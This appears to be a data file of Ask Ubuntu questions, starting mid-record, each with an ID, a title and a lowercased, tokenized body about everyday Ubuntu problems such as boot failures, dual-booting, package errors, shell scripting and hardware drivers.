/var/cache/apt/archives/chromium-browser_28.0.1500.71-0ubuntu1.13.04.1_i386.deb ( -- unpack ) : can not copy extracted data for './usr/lib/chromium-browser/libs/libicuuc.so ' to '/usr/lib/chromium-browser/libs/libicuuc.so.dpkg-new ' : unexpected end of file or stream errors were encountered while processing : /var/cache/apt/archives/chromium-browser_28.0.1500.71-0ubuntu1.13.04.1_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) output of sudo apt-get autoremove : eugene @ eugenelinuxbox : ~ $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done you might want to run âapt-get -f installâ to correct these . the following packages have unmet dependencies . chromium-browser-l10n : depends : chromium-browser ( > = 28.0.1500.71-0ubuntu1.13.04.1 ) but 28.0.1500.52-0ubuntu1.13.04.3 is installed e : unmet dependencies . try using -f. last suggestions solved and it would be a duplicate
326702	why does ubuntu boot so slowly ? ( 13.04 )	i wonder if anyone has any idea why my system boots so slowly . it 's taking 40 seconds to reach the login screen , another 20 or so to display the desktop , and another minute or so before my main software ( firefox and libreoffice writer ) are ready to go . i 'm running ubuntu 13.04 ( the secure remix ) , dual booting with win8 ( which actually boots a lot snappier , frustratingly ) . my last bootlog .png is here i 've done a fair bit of googling , but none of the suggestions i 've come across have helped . ( i did find one useful bit of info here , which displays all the start-up applications in 'startup applications ' , not just a couple of them . but even after unchecking all but the essentials ( and the unknowns ) i 'm still booting slowly . any advice would be really appreciated . let me know if any more info would be useful . thanks !
326704	how to change the default directories used by nautilus default bookmarks ( documents , music , etc . ) ?	my computer came with an windows os partition ( c : ) and a data partition ( d : ) . i placed all my default documents , music , photos , videos , etc . folders in the d : \ partition . how can i integrate the same d : \ partition with ubuntu so that the default bookmarks used to read , write , or execute files in nautilus ( e.g. , documents , music bookmarks ) point to directories in my data partition ( d : ) instead of the home folder on the ubuntu partition ?
326705	search and replace inconsistency between vim and sed	using the ubuntu 12.04 and vim 2.22.0 , why inside the vim i shall use : :9s/\d\+/1/ to change first digit of the mentioned line to 1 , but could n't be able to use the same with sed as : sed -i '9s/\d\+/1/ ' /home/file/foo i still do n't get any error neither any changes in the file . do we have any inconsistency between the functionalities of vim and sed command ?
326708	how do i switch from dual boot to vm ?	my computer is currently dual booted with ubuntu 13.04 and windows 7 . i 'd like to just have ubuntu installed , and run windows in a virtual machine . what would be the best way to do this without losing any files ?
326710	inability to install on acer 4530 with vista	i have tried to make a clean ubuntu 12.04 installation on an acer 4530 currently running win vista . it appears that even though i am able to switch booting sources through the bios , these other sources , usb ports and dvd drive are not active and they can not be activated through the bios . i really would love to format and have a clean installation of ubuntu 12.04 but nothing works . wubi does not work since it requires reboot through usb port , dvd does not work with an error message saying no operating system found . any assistance will be greatly appreciated . thank you .
326723	how to install canon mx922 printer ?	i could not find an appropriate driver for the printer . tried other canon drivers ; a generic postscript and generic pcl5/6 but when i send a print job , the printer wakes up but does not print . the same happens when using wireless or usb connection . other canon printers work just fine .
326728	move terminal out of home directory	to make a long story short , ( trying to install lightscribe ) , it has installed to computer > opt > lightscribe > simple labeler > ( launchbrowser.sh ) , which is a root folder . i am trying to open a terminal and cd to the folder so i can take ownership so i can run the program . however every time i try the cd command i get the error msg `` user/home/computer does not exist '' . how do i do this , or is there a better way of accessing this program , i really do n't want to have to reboot into windows every day just to burn a few disk . i have seen several forum post where other people were having problems and eventually got it working , and i tried what they did and it did not work for me .
326731	can i shrink gedit 's side panel ?	my laptop screen is fairly small and gedit 's side panel wo n't go smaller than about 400 px . it is a little exasperating because i ca n't have any other windows visible if i want to use anything in the sidebar , because it crowds out my document . is there a setting someplace that i can fiddle to make it smaller ? i 've looked everywhere i can think of for it ! i can drag it down to the width you see below , but i ca n't drag it any farther than that .
326732	ubuntu 12.04.2 ( 64bit ) not booting on samasung z700 ( switching to clocksource tsc )	i have installed ubuntu precise 12.04.2 ( 64bit , linux 3.5 ) on a samsung z700 . i did update the bios and disabled the uefi before the installation ( grub does not go the efi mode , so that 's good ) . booting ubuntu from the usb thumb drive works fine , but it refuses to boot once it is installed . i do get beyond grub , and then it freezes at the first purple screen ( the one without moving dots ) . when trying to boot into `` safe mode '' , it freezes at switching to clocksource tsc i did some research and found this and this . however , i can not get it booting . what i do n't understand : why can it boot from usb , but not once it is installed ? how should i approach this ? can i boot it in the mode that is used to get it booted from the usb ?
326735	where are theme pictures found	this is simple , i want to download new pictures/themes for my desktop , but i do n't know where to save them once they are downloaded , so that when i right-click on the desktop , those pictures show up .
326736	open music files with different application from dash ?	i was wondering if it is possible to click on music files in dash and have them open with a specific application instead of always opening it with rhythmbox ?
326737	minimal bash-no disc	i have ubuntu 12.04 .my system froze so i attempted a restart.a screen came up with minimal bash , possible commands . i saw where some recommended reloading the setup disc.i do not have a disc.i downloaded of the internet . so what do i need to do to rectify the problem ?
326739	how to add your eclipse workspace folder to your path ?	i am using ubuntu 12.04 . hi i have been working on the following issue for a couple of days and as much as a i look at the many different answers ( what is path environment variable and how to add it ) i can not make them work . i would be extremely grateful if anyone could detail me the required steps for a basic ubuntu user : i have eclipse installed in my dropbox folder and i have some python .py files on it . i have managed to add this folder to the path and now when i execute : echo $ path i can see ( among others ) my folder with the python codes . however when i try to run these files from any other folder : $ python helloworld.py i get : python : ca n't open file 'helloworld.py ' : [ errno 2 ] no such file or directory update : the solutions described below provide the main steps to make this work : 1 ) add to your python scripts ( .py ) the `` shebang '' line # ! /usr/bin/python this must be the first line in your code . 2 ) go to the folder where the python script is located and source it : chmod +x yourscript.py once it is done you can run it from any folder ( and the auto-complete will work ) . incidentally , ( this works in eclipse ) if you duplicate an executable script within the editor , you can clear it and rename it and it shall remain executable . so you can avoid step two .
326746	there are many problems installing ubuntu	i am having a lot of problems installing ubuntu 13.04 . i have windows 7 , and i want to install ubuntu alongside windows , and the install alongside option does n't exist , there is install inside windows 7 . another problem is that while installing the windows 7 partition does n't appear , and the unallocated space does n't appear . i don`t know why .
326754	error code 500 , i have an error while i am trying to view index.php file	dear people who will read this i was programming php by fallowing tutorial with phpacademy login and register tutorial before that it was fine and i noticed after i closed terminal it gave me 500 error code it also says the website encountered an error while retrieving nameofmydomain/lr/index.php . localhost is my server name it may be down for maintenance or configured incorrectly code for the index.php file < ! doctype html > < html > < ? php include 'includes/head.php ' ; ? > < body > < ? php include 'includes/header.php ' ; ? > < div id= '' container '' > < ? php include 'includes/aside.php ' ; ? > < h1 > home < /h1 > < p > just a template. < /p > < /div > < ? php include 'includes/footer.php ' ; < /body > < /html > all i did is fallowed tutorial in video 3 by including head , header , aside , footer , pretty much i am linking php files to index.php file . i do n't know why it gave me error server error code 500 . i already cleared cache deleted cookies , after i deleted cookies i restarted my browser and it still gives me an error . any suggestions , any help , any advice would be greatly appreciated . sincerely guy who needs help with his localhost server . i already read error log so i 'm gon na say on line 13 there opening and closing script tag .
326757	is linux swap really needed ? accidentally deleted	my dell laptop has a 500 gb hard-disk . i planned to install dual os in it , so i re-sized the disk using gparted and my primary os is ubuntu 12.10 . while resizing my disk , it displays an error only for primary partition can you partition size . please find the link for screen shot of my partition details . in additionally one partition with 8gb of linux swap is already i deleted accidentally so the disk is now possibly to re-sized for creating a sda4 for another os . now when i boot my primary os ubuntu i am facing a small error that `` uaaa-ssdds -- -- -- - '' is missing wait for mounting automatically or s for skip or m for manually mounting . how to solve this problem i i need to recreate a linux swap .
326758	how can we connect the samba domain server w/ ldap backend from ubuntu client ?	i already setup samba domain controller with ldap backend in ubuntu 12.04 / 13:04 see more at : http : //www.unixmen.com/setup-samba-domain-controller-with-openldap-backend-in-ubuntu-13-04/ # sthash.p6untnp7.dpuf in that tutorial shows how to join a windows client to samba domain and it works but how we can join the ubuntu client to samba domain like windows did ? from login system using the user accounts that created from the domain server ?
326760	difference between ubuntu partitions and windows partitions	i had first installed ubuntu using wubi through windows , on my drive d , the drive contains some windows files as well , no i want to move my wubi install and make it a regular install on drive c. migratewubi is a good tool i found to accomplish this task , but i am confused with the naming differences in ubuntu and windows . my windows have four partitions in total and ubuntu 's fdisk -l command shows sda1-sda6 how would i know which sda corresponds to drive c in windows .
326763	black screen on boot . 12.10	i am currently running a dual boot with windows 7 and ubuntu . i updated my ubuntu from 12.04 to 12.10 . when it was done installing the packages for 12.10 it gave me the options to restart my computer now or later . i clicked restart now . when i clicked it , all of the icons and launch bar disappeared so all i could see was my wallpaper as if it was about to shut down . it was stuck just showing my wall paper for 3 hours . so i finally cut my computer off with the power button but now when i boot ubuntu back up , it shows a purple screen and then goes black and just stays there . if i press the brightness button on my keyboard it makes the ubuntu loading screen pop up but all the dots are froze on orange . i ca n't do anything . has anyone else had this problem ? if so , can you help ?
326765	ca n't execute scripts on a mounted driver	when i want to execute some programs i get a message which say permission is denied . the files are allowed to be executed , and i use sudo . example : # ./configure bash : ./configure : permission denied what is the problem ? this is the ls -l on the directory : -pc : /media/h/gtimer-2.0.0 $ ls -l total 756 -rwxrwxrwx 1 root root 40052 mar 27 2010 aclocal.m4 -rwxrwxrwx 1 root root 5483 mar 27 2010 annotate.c -rwxrwxrwx 1 root root 498 mar 27 2010 authors -rwxrwxrwx 1 root root 14633 mar 28 2010 changelog -rwxrwxrwx 1 root root 4746 mar 27 2010 changelog.c -rwxrwxrwx 1 root root 16690 mar 28 2010 changelog.h -rwxrwxrwx 1 root root 6392 mar 27 2010 config.c -rwxrwxrwx 1 root root 3249 mar 27 2010 config.h -rwxrwxrwx 1 root root 169973 mar 27 2010 configure -rwxrwxrwx 1 root root 1340 mar 27 2010 configure.ac -rwxrwxrwx 1 root root 1466 mar 27 2010 configure.in -rwxrwxrwx 1 root root 8724 mar 27 2010 confirm.c drwxrwxrwx 1 root root 0 jul 31 06:10 contrib -rwxrwxrwx 1 root root 17982 mar 27 2010 copying -rwxrwxrwx 1 root root 21780 mar 27 2010 custom-list.c -rwxrwxrwx 1 root root 2817 mar 27 2010 custom-list.h -rwxrwxrwx 1 root root 17574 mar 27 2010 depcomp -rwxrwxrwx 1 root root 19068 mar 27 2010 edit.c -rwxrwxrwx 1 root root 3707 mar 27 2010 faq.html -rwxrwxrwx 1 root root 9337 mar 27 2010 gettext.h -rwxrwxrwx 1 root root 2547 mar 27 2010 gtimer.1 -rwxrwxrwx 1 root root 144 mar 27 2010 gtimer.desktop -rwxrwxrwx 1 root root 242 mar 27 2010 gtimer.doc-base -rwxrwxrwx 1 root root 4762 mar 28 2010 gtimer.h -rwxrwxrwx 1 root root 1578 mar 27 2010 gtimeri18n.h -rwxrwxrwx 1 root root 158 mar 27 2010 gtimer.install.in -rwxrwxrwx 1 root root 4230 mar 27 2010 gtimer.xpm -rwxrwxrwx 1 root root 18165 mar 27 2010 http.c -rwxrwxrwx 1 root root 3745 mar 27 2010 http.h drwxrwxrwx 1 root root 4096 jul 31 06:10 icons -rwxrwxrwx 1 root root 7831 mar 27 2010 install -rwxrwxrwx 1 root root 5598 mar 27 2010 install-sh -rwxrwxrwx 1 root root 17 mar 27 2010 license -rwxrwxrwx 1 root root 94377 mar 27 2010 main.c -rwxrwxrwx 1 root root 767 mar 27 2010 makefile.am -rwxrwxrwx 1 root root 19189 mar 27 2010 makefile.in -rwxrwxrwx 1 root root 11135 mar 27 2010 missing -rwxrwxrwx 1 root root 722 mar 27 2010 mkinstalldirs -rwxrwxrwx 1 root root 28 mar 27 2010 news drwxrwxrwx 1 root root 4096 jul 31 06:10 po -rwxrwxrwx 1 root root 10846 mar 27 2010 project.c -rwxrwxrwx 1 root root 2111 mar 27 2010 project.h -rwxrwxrwx 1 root root 3010 mar 27 2010 readme -rwxrwxrwx 1 root root 62715 mar 27 2010 report.c -rwxrwxrwx 1 root root 5980 mar 27 2010 requests -rwxrwxrwx 1 root root 2449 mar 27 2010 rules -rwxrwxrwx 1 root root 19349 mar 27 2010 task.c -rwxrwxrwx 1 root root 3170 mar 27 2010 task.h -rwxrwxrwx 1 root root 7679 mar 27 2010 tcpt.c -rwxrwxrwx 1 root root 2528 mar 27 2010 tcpt.h -rwxrwxrwx 1 root root 627 mar 27 2010 txt2h.pl -rwxrwxrwx 1 root root 9678 mar 27 2010 unhide.c -rwxrwxrwx 1 root root 2561 mar 27 2010 xextras.c
326766	randomly getting logged out	it just started today . i 'm getting repeatedly logged out of xubuntu . i have also had a new option come up after logging in that lets me load a session . i 've just been loading default and i 'd like to know how i can get rid of this screen as well as find out why i 'm being logged out . i 'm also noticing an error message everytime i get to the desktop that says `` invalid option : -session '' .
326769	tried running ubuntu from usb	i 've tried every single `` make a bootable usb for ubuntu '' program i can . i generally got nothing until i noticed i could change the bios from uefi to legacy bios . since then , all that happens is i get the `` choose language '' screen , then the one that offers `` run from usb '' , `` install '' , and so on . all of these result in a black screen that does n't respond to any keyboard input . i 've tried several versions , all that changes is the colour of the screen . all of them under every option result in a pitch black screen . i 've made a partition for installing ubuntu if i liked it , but since then i 've never actually managed to use it . everything results in a black screen . i 'm using an acer aspire v-3 731 with windows 8 .
326777	how to install slidewall ?	i have some issues downloading slidewall . i have entered the correct terminal commands , and have checked them several times to be sure , but when i actually try to install the program , i always get this : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package slidewall is there any way for me to install it successfully ?
326786	mono 3.0 preview - monodoc monodoc-browser issue	i have a ubuntu 13.04 box and i 'd like to get mono 3.0 installed . i found this blog-post here by one of the developers for the ubuntu mono group : https : //www.meebey.net/posts/mono_3.0_preview_debian_ubuntu_packages/ however , when i tried to do it , i got the following error at the end of the apt-get install mono-complete command : processing triggers for monodoc-browser ... generating monodoc search index ... grep : /etc/gre.d/*.conf : no such file or directory unhandled exception : system.typeloadexception : could not load type 'monodoc.editmerger ' from assembly 'monodoc , version=1.0.0.0 , culture=neutral , publickeytoken=0738eb9f132ed756 ' . [ error ] fatal unhandled exception : system.typeloadexception : could not load type 'monodoc.editmerger ' from assembly 'monodoc , version=1.0.0.0 , culture=neutral , publickeytoken=0738eb9f132ed756 ' . i do n't believe this to be a show-stopper ( maybe someone can enlighten me ) . it seems this is a common issue for those that compile it , but i 'm using a package . in case it 's important , this is a minimal installation without any form of desktop ( so i do n't think i could use monodoc-browser anyway ) .
326788	openoffice on ubuntu software center	why openoffice is not available in ubuntu software center ? if ubuntu choose libreoffice over openoffice , that does not mean that openoffice should be removed or not available as an option . is n't having more options is one of the great things about linux and open source . if having problems coexisting with libreoffice , a warning or a statement should be issued when installing openoffice from the ubuntu software center , such as `` you ca n't install openoffice and libreoffice at the same time , would you like to remove libreoffice ? '' to be honest i 'm having problems with libreoffice such as it 's slow and lagging when scrolling on huge pages of documents .
326789	looking to build a new desktop machine	i 'm in need of a new desktop machine for both work and play . i 'll be running a few vbox instances at once and would like to have multiple monitors connected to this machine to support these instances . the goal is to have 4 monitors so i can run these instances and view them at the same time ( still need the money for this but it is my goal hahaha ) . rather then just tossing money around and hoping i 'd like to start doing some research now on hardware . where should i look to get a good idea which items are compatible with ubuntu and fully support the os ? in the past i was building more for windows and would run ubuntu in an image but now i an finally be done with windows and really want to build this machine solely for ubuntu : )
326791	find files in particular directories and replace phrase	i have a directory structure of the following . ├── dir1 │ ├── a │ │ ├── x.file │ │ ├── y.file │ │ └── z.file │ ├── b │ │ ├── x.file │ │ ├── y.file │ │ └── z.file │ └── c │ ├── x.file │ ├── y.file │ └── z.file └── dir2 ├── a │ ├── x.file │ ├── y.file │ └── z.file ├── b │ ├── x.file │ ├── y.file │ └── z.file └── c ├── x.file ├── y.file └── z.file etc . there are files named x.file in folders named b that i want to change a phrase in each . how can i do this without changing the other files named x.file in other directories and folders in fastest way possible ? thank you .
326793	basic script listing directories ( [ : discover : unexpected operator )	i encounter an issue running a basic script listing directories . for item in * do if [ -d $ item ] then echo $ item fi done the outcome : lists all system folders returns an error : for.sh : 4 : [ : discover : unexpected operator lists all my folders , whose names start from a lowercase character my guess is -d finds some issue with an initial lowercase character ? can somebody please explain why it happens ? thanks a lot in advance .
326794	how to full screen applications in lubuntu ?	i must have pressed some keys accidentally or something else and my eclipse window got in a full screen mode . the title bar of the window and the os task bar disappeared . everything else is normal . i can switch between apps using alt+tab and get to desktop using super+d . i am confused is this a bug or a feature ? can i replicate this ? i kind of love the extra screen space i get in this mode . this screenshot is not edited . it is the full screen shot showing eclipse without title bar and without operating system task bar .
326803	change the year of a file , keeping the month and day of month	i have quite a few ( 3000+ ) jpeg files which i would like to the year of the creation date . i would like to keep the original date , except for the year which should be changed from whatever it is to 2013 . i tried touch , giving only the year to the -- date option : touch -- date 2013 f1219486.jpg the year is changed to 2013 , but the month and day are changed to today . using -date 20130000 and other wildcard variants did not work . can i touch only the year of a file using touch ( or other command ) ?
326807	not able to open usb drives in thunar , ubuntu 12.04 and 12.10 using fluxbox	as the title states , i am unable to open usb drives from within thunar . when i click the drive icon i get the following message : failed to mount volume , permission denied i installed ubuntu with the mini.iso and after the base installation only fluxbox , no other wm or de . i log in via terminal and start xserver with the command startx ( xinit ) , no dm . i have been able to make a crude workaround with some scripts using pmount so that i can mount any drive from the fluxbox menu , but i would like to be able to mount the drives from within thunar . i have googled quite extensively but i have found no working solution . any further information needed will be provided gladly . any help will be much appreciated !
326809	which ubuntu derivatives plan to support xorg in the future ?	as far as i know ubuntu plans to replace xorg with mir in the future . wm 's who need xorg will run on an intermediate layer called xmir instead . in which version will ubuntu remove xorg from the repositories completely ? ( that 's interesting for me since i usually do a minimal ubuntu install and then add some exotic wm 's i like ) . if ubuntu will drop the support for xorg , is there any ubuntu based distro ( like mint or lubuntu ) which has official plans not to use xmir and to provide an own package of xorg instead ?
326810	slight issues with ubuntu	so not to long ago i got a second hard drive to install ubuntu . i installed it perfectly with windows being on my other original hard drive . when i was first running ubuntu it was fine . then as soon as i shut it down and then booted to the windows drive i noticed that the windows time was off . when i booted back into ubuntu on the second drive i noticed the resolution was off and no longer had 2 screen support like i did before . does anyone know how i can fix this and make the two os 's work in harmony , or at least not affect each other .
326812	black screen on macbook pro 6,2 after installing 12.04lts - tried everything already	i am tri-booting mac os 10.6.8 ( snow leopard ) , windows 8 , and ubuntu . i installed via a usb drive . the install and the livecd trial went flawlessly , and i can boot into grub . however , as soon as i press enter on the installed ubuntu , it brings me to a black screen . i left it there for about an hour , and it was still black . no words or anything . i tried 13.04 , and that worked , but it was n't 100 % compatible , so i much prefer the lts . so far , i have tried : failsafe graphics reinstalling putting nomodeset and no splash in grub the custom mac livecd ( would n't boot from the usb drive ) adjusting my brightness ( believe it or not , that 's a common solution ) switching graphics mode through grub ( got a garbled mess , but i think unity was running in there somewhere because my backlit keyboard lit up ) entering -- quiet splash nomodeset and quiet splash nomodeset ( brought me to the splash screen with orange dots , then kicked me back out to a totally black screen ) pressing esc during the splash screen ( gave me a bunch of checks , all came back [ ok ] , but kicked me to the black screen again ) keep in mind , i 'm kind of a beginner . i know much more than the average beginner , but i would n't call myself intermediate just yet . one more thing : the black screen i 'm getting is not backlit , and there is no blinking cursor . it looks as if i turned the computer off , but the fans are still running and i think the hard drive is still doing something )
326818	gmagick fails to install from source	i 'm trying to install gmagick php extension from source , using these commands : mkdir gmagick cd gmagick mkdir build mkdir local cd $ home/gmagick/build wget ftp : //ftp.graphicsmagick.org/pub/graphicsmagick/1.3/graphicsmagick-1.3.18.tar.gz tar zxvf graphicsmagick-1.3.18.tar.gz cd graphicsmagick-1.3.18 ./configure -- prefix= $ home/gmagick/local -- enable-shared -- enable-symbol-prefix make make install export path= $ home/gmagick/local/bin : $ path cd $ home/gmagick/build wget http : //pecl.php.net/get/gmagick-1.1.2rc1.tgz tar zxvf gmagick-1.1.2rc1.tgz cd gmagick-1.1.2rc1 phpize export pkg_config_path= $ home/gmagick/local/lib/pkgconfig ./configure -- prefix= $ home/gmagick/local -- with-gmagick= $ home/gmagick/local make make install echo `` extension=gmagick.so '' > /etc/php5/conf.d/gmagick.ini service php5-fpm restart the lines below contain the command that tests if is installed correctly and it 's output . php -i | grep gmagick php warning : php startup : unable to load dynamic library '/usr/lib/php5/20100525+lfs/gmagick.so ' - /usr/lib/php5/20100525+lfs/gmagick.so : undefined symbol : magickblurimage in unknown on line 0 /etc/php5/cli/conf.d/gmagick.ini , pwd = > /root/gmagick/build/gmagick-1.1.2rc1 oldpwd = > /root/gmagick/build _server [ `` pwd '' ] = > /root/gmagick/build/gmagick-1.1.2rc1 _server [ `` oldpwd '' ] = > /root/gmagick/build
326820	ubuntu 12.04 lts 64 bit - firefox asks if it could be the default browser every time i open it	nearly every time i open firefox it asks to be the default browser . as far as i can see firefox is the only browser installed . ubuntu 12.04 lts 64 bit hp envy dv7 intel® core™ i7-3630qm cpu @ 2.40ghz × 8
326823	could there be a graphics card in an ubuntu touch dock	so , once i get an ubuntu touch phone that can dock into a kb-mouse-display , i wo n't need a desktop anymore . except for playing games . i do n't expect the phone to be able to render millions of polygons . that is , unless there 's a graphics card in the dock . that would make for an expensive dock , alright , but then , i can really let go of the fat case . now that you think of it , there is plenty of equipment that belong in a desktop and not in a phone that could be simply added to the dock . does the architecture of ubuntu touch allow for that ?
326826	.bashrc is changed but there are no changes in the system	bashrc file : alias edit_bash='gedit ~/.bashrc' export ps1= '' \u : \w : $ `` after rebooting the command edit_bash does n't work ( not found ) and the greeting is still the same as it was before . what 's up with that ? # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything case $ - in *i* ) ; ; * ) return ; ; esac # do n't put duplicate lines or lines starting with space in the history . # see bash ( 1 ) for more options histcontrol=ignoreboth # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # if set , the pattern `` ** '' used in a pathname expansion context will # match all files and zero or more directories and subdirectories . # shopt -s globstar # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ { debian_chroot : - } '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt # force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # add an `` alert '' alias for long running commands . use like so : # sleep 10 ; alert alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \s*alert $ //'\ '' ) '' ' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if ! shopt -oq posix ; then if [ -f /usr/share/bash-completion/bash_completion ] ; then . /usr/share/bash-completion/bash_completion elif [ -f /etc/bash_completion ] ; then . /etc/bash_completion fi fi path= $ path : $ home/.rvm/bin # add rvm to path for scripting # export path=/opt/sbt/bin : $ path # # # added by the heroku toolbelt export android_sdk_home=/home/alex/android-sdk-linux export path= $ android_sdk_home : $ path alias edit_bash='gedit ~/.bashrc' export ps1= '' \u : \w : $ `` path echo $ path /home/alex/.rvm/gems/ruby-1.9.3-p392/bin : /home/alex/.rvm/gems/ruby-1.9.3-p392 @ global/bin : /home/alex/.rvm/rubies/ruby-1.9.3-p392/bin : /home/alex/.rvm/bin : /home/alex/bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : $ android_sdk_home : /home/alex/bin : /usr/local/java/jdk1.7.0_17/bin : /home/alex/bin : /usr/local/java/jre1.7.0_17/bin : /home/alex/bin : /home/alex/android-sdk-linux : /home/alex/bin : /usr/local/java/jdk1.7.0_17/bin : /home/alex/bin : /usr/local/java/jre1.7.0_17/bin : /home/alex/bin : /home/alex/android-sdk-linux
326831	does ubuntu advantage advanced services support ubuntu version 13.04 ?	does ubuntu advantage advanced services support ubuntu version 13.04 ? also , i keep getting an error stating that this post does not meet our quality standards . please explain why ?
326832	problems in git upgrade	when i run upgrade in my ubuntu 10.04 , the result is ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : git git-all git-arch git-cvs git-daemon-run git-email git-gui git-man git-svn gitk gitweb linux-generic linux-headers-generic linux-image-generic ubufox 0 upgraded , 0 newly installed , 0 to remove and 15 not upgraded . why are some packages not upgraded ?
326833	how to make ubuntu gateway ?	i am new on ubuntu . i want to make a gateway . i have some 25 systems and switch but i do n't have any server . i want to setup a system as a gateway system and want to make a firewall . i want that every user whenever access internet it should be through firewall and want to assign separate speed to every user of accessing internet . please somebody tell me how can i make this proper way ?
326834	why does the script list directories starting with uppercase first , and all-lowercase second ?	the thread is an extension of : basic script listing directories ( [ : discover : unexpected operator ) when i execute the script : for item in * do if [ -d `` $ item '' ] then echo `` $ item '' fi done it lists the folders that were automatically assembled during system instalation ( desktop , documents , downloads ) , or automatic installations of applications ( dropbox ) , and then mine ( dosgames ) , instead of arranging them all together in alphabetical order ( desktop , documents , dosgames , downloads , dropbox ) . why does it run two separate checks if it 's checking for a common characteristic ( -d ) ? the output : dokumenty dropbox muzyka obrazy pobrane publiczny pulpit szablony wideo dosgames learning_linux new tset i use the polish version , hence the names of the directories . these however are all default system directories , if not obviously not ( ie . dropbox , dosgames )
326835	ubuntu software center install button disbled in ubuntu 13.04	i just upgraded the ubuntu 13.04 to from 12.10 using following commaands sudo apt-get update sudo apt-get upgrade the upgrade process is completed successfully but in software center for every software i want to install `` install '' button is disbled also no popup for admin password ( in 12.10 when i open the software center it asking the admin password ) can you please help me on above issue ?
326837	kindle 2 not detected 12.04	my kindle is not being mounted by the machine . i am using a kindle touch 2 on 12.04 lts . any suggestions . help is appreciated .
326843	a usb flash drive failed to boot ubuntu	i tried to make a bootable ubuntu 12.04 lts on my kingston flash drive . but somehow it always fail to boot . i obtain the *.iso from http : //www.ubuntu.com/download/desktop , and i use unetbootin on my windows 7 to create the bootable flash . after reboot and choose to boot from usb flash drive , i got the following message : boot error _ < - '' i can type stuff here '' i try another method and create the bootable using universal usb installer , this time after i reboot and choose to boot from the usb flash drive this following message show up : syslinux 4.06 edd 2012-10-23 copyright 1994-2012 peter anvin et al error : no configuration file found no default or ui configuration directive found ! boot : `` i can type stuff here '' i tried to rename the isolinux folder , isolinux.cfg and isolinux.bin into syslinux folder , syslinux.cfg and syslinux.bin . but the same thing as above still occur . i have n't tried ubuntu at all ( or any other linux in that matter ) . i decided to try ubuntu after recently my windows 7 blue screen on me quite frequently . but i ca n't make any decision before i try the ubuntu at least once . therefore i am grateful for any help .
326847	editing grub to boot from live iso	hey guys i am wondering if it is possible to edit grub at ubuntu 13.04 to show option to boot from live iso image on the hard drive ? , also to show option to boot to ubuntu at same time sure .
326857	wireless card not detected ?	i opened up my laptop and i can see the wireless card installed . [ the hardware ] . yet i do n't see it working . here 's a screenshot screenshot wi-fi device is { none } . what does this mean ? does it mean that my network card is broken or something ? what are the possible solutions ? also , i remember i ran the bios setup from here . i had changed the operating system , and was installing all the drivers , and with all the audio/video drivers , i ran bios too . but i guess , after that , my wireless did work for a decent span of time , and then i turned on to ubuntu , and it stopped working . i am not sure if this is relevant at all or not . but just informing . i am using dell inspiron 1545 . output of kraken @ kraken-inspiron-1545 : ~ $ sudo lshw -class network [ sudo ] password for kraken : *-network description : ethernet interface product : 88e8040 pci-e fast ethernet controller vendor : marvell technology group ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 13 serial : 00:23 : ae:34:46 : d2 capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=sky2 driverversion=1.30 latency=0 link=no multicast=yes port=twisted pair resources : irq:45 memory : f69fc000-f69fffff ioport : de00 ( size=256 ) kraken @ kraken-inspiron-1545 : ~ $ 